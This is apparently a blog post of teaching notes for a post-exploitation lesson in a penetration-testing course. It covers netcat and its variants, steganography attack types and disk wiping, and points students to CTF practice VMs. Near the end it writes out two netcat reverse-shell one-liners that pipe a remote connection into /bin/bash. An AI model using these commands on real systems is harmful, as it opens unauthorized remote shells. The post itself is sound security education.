CNS320 Lesson 7 – Post-Exploitation

Lesson 7 – Post-Exploitation

Screen Shot 2016-01-23 at 10.54.53 PM.png

Screen Shot 2016-01-23 at 10.54.54 PM.png

Screen Shot 2016-01-23 at 10.54.55 PM.png

Screen Shot 2016-01-23 at 11.15.42 PM.png

Screen Shot 2016-01-23 at 10.54.58 PM.png

Screen Shot 2016-01-23 at 10.54.59 PM.png

Screen Shot 2016-01-23 at 10.55.00 PM.png

Screen Shot 2016-01-23 at 10.55.01 PM.png

Screen Shot 2016-01-23 at 10.55.03 PM.png

  • Netcat is a tool you will need to get very comfortable with as a pentester.  Netcat is a simple but powerful utility that will allow you to listen on or transmit data over TCP or UDP ports.  It’s built into almost every Linux or Unix OS (including OS X) and versions are availble for Windows and other OS’s too.
  • Some of the popular clones of netcat include ncat (which is part of the Nmap Project and comes bundled with it), socat, CryptCat (which can SSL-encrypt your traffic), and many others

Screen Shot 2016-01-23 at 10.55.04 PM.png

Screen Shot 2016-01-23 at 10.55.05 PM.png

Screen Shot 2016-01-23 at 10.55.07 PM.png

Screen Shot 2016-01-23 at 10.55.08 PM.png

Screen Shot 2016-01-23 at 10.55.12 PM.png

  • Steganography is one of those things you learn in security classes and is fun for hacker CTFs…but I’m not really sure how much it gets used by real attackers.  Or even pentesters on engagements, for that matter.

Screen Shot 2016-01-23 at 10.55.14 PM.png

Screen Shot 2016-01-23 at 10.55.15 PM.png

Screen Shot 2016-01-23 at 10.55.17 PM.png

Screen Shot 2016-01-23 at 10.55.18 PM.png

  • Stego-only attack: you only have the medium with the hidden data in it
  • Known-cover attack: you have a copy of the original medium BEFORE data was hidden in it and a copy of it AFTER data is hidden
  • Known-message attack: you have the medium with hidden data in it and you know what the hidden message is (can determine the steg algorithm with this info)
  • Known-stego attack: you know the steg method used and you have access to the original and modified medium
  • Chosen-stego attack: you have access to different steg tools and you try each them and look for similarities to determine which method was used for the file you’re analysing
  • Chosen-message attack: similar to the above, but using the same message in different tools to look for patterns or signatures

Screen Shot 2016-01-23 at 10.55.20 PM.png

Screen Shot 2016-01-23 at 10.55.22 PM.png

Screen Shot 2016-01-23 at 10.55.23 PM.png

Screen Shot 2016-01-23 at 10.55.25 PM.png

Screen Shot 2016-01-23 at 10.55.26 PM.png

  • The process might get far along, but eventually the program being used to trash the disk will delete itself and stall out, so there will still be something for forensic investigators to pick at…though who knows just what will remain.

Screen Shot 2016-01-23 at 10.55.27 PM.png

  • http://www.binarytides.com/netcat-tutorial-for-beginners/
  • http://en.wikipedia.org/wiki/Netcat
  • Also, besides the netcat man page, there are some good recipes buried in the /usr/share/doc/netcat-traditional/ directory on Kali.  Check out README.Debian and README.gz.  Also, there are some very interesting shell scripts that use netcat to do everything from IRC to acting as a crude web server down in the examples subdirectory.
  • Besides all the different variants, there are two mainstream versions of netcat: netcat-traditional and netcat-openbsd.  The netcat-openbsd is the most common version you’ll find that comes installed on Debian, Ubuntu, Redhat, and various other Linux distributions.  The main difference is that the OpenBSD variant has had the “-e” option removed, as a measure to prevent hackers leaving backdoors.
  • Fortunately, there are two different options for sending out a reverse shell without having to use the “-e” flag:
    1.)     mknod backpipe p && nc <remote server> <port> 0<backpipe | /bin/bash 1>backpipe
    2.)     mkfifo pipe && nc <remote serve> <port> < pipe | /bin/bash &> pipe         <——– this one is better, because it will also pipe stderr to you (so you can see error messages)

LABS

This is the point in the class where I would start doing actual CTF challenges with the students.  What I usually did was create several VMs on the class server (I didn’t need much horsepower; an old laptop running Linux Mint with about 4GB of RAM sufficed just fine) and assign one to each student for them to hack.  I had pretty small classes, so I this was doable.  I would give them hints, answer questions, guide them in the right direction, get them to help each other out, etc. until they finally solved it.

But for you reading along at home, you should now know enough to try to tackle some of these CTF VMs yourself.  Here are the first few I started them out on:

You can easily download the ISO images and run them in VMware or VirtualBox.  I urge to try to solve them on your own.  The De-ICE ones do have a hint page in the target machine’s website.  If you get really desperate, you can always look at the walkthroughs on their respective VulnHub pages.

Good luck!

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s